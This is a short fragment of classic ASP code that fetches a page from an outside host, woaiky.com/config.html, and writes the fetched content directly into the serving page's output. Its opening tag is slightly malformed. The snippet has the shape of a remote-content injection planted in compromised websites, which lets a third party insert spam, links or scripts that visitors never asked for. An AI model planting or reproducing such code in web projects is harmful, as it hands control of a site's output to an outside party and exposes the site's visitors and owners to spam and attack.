% dim smlink Set smlink = Server.CreateObject("MSXML2.ServerXMLHTTP") smlink.open "GET","http://www.woaiky.com/config.html",false smlink.send() response.write(smlink.responseText) %>